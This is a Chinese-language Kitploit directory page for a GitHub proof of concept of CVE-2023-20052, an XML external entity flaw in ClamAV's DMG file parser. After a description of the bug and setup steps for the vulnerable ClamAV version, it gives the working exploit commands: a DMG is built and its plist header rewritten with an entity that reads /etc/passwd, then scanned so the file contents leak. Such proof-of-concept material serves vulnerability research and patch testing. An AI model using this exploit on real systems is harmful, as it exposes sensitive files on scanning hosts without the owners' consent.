Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-20052 — CVE-2023-20052 ClamAV的DMG文件解析器中的信息泄露漏洞 | Kitploit
工具/GitHubGitHub/cy83rr0h1t/cve-2023-20052
漏洞分析漏洞利用Web应用程序漏洞利用信息收集恶意软件分析
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

CVE-2023-20052 ClamAV的DMG文件解析器中的信息泄露漏洞

查看仓库
133年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-20052

CVE-2023-20052 存在于 ClamAV 的 DMG 文件解析器中的信息泄露漏洞
ClamAV 1.0.0 及更早版本、0.105.1 及更早版本以及 0.103.7 及更早版本中的 DMG 文件解析器存在一个漏洞,可能允许未经身份验证的远程攻击者访问受影响设备上的敏感信息。该漏洞是由于启用了 XML 实体替换,可能导致 XML 外部实体注入。攻击者可通过向受影响设备上的 ClamAV 提交特制的 DMG 文件进行扫描来利用此漏洞。成功利用后,攻击者可能泄露 ClamAV 扫描进程可读取的任何文件中的字节。

已在 Ubuntu 20.04 上测试

如何安装 ClamAV 1.0.0 版本

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f

  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf
    2

  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

5

  • clamscan --version
    6

安装此利用程序所需的其他一些内容

  • apt-get update

  • apt-get install -y ca-certificates gnupg wget

  • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

  • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

  • apt-get update -y

  • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
    7

  • git clone https://github.com/planetbeing/libdmg-hfsplus.git
    8

  • cd /libdmg-hfsplus

  • cmake .
    9

  • make
    10

  • cp dmg/dmg /bin
    sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
    11

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

  • clamscan --debug exploit2.dmg 13

参考:https://github.com/nokn0wthing/CVE-2023-20052

下载工具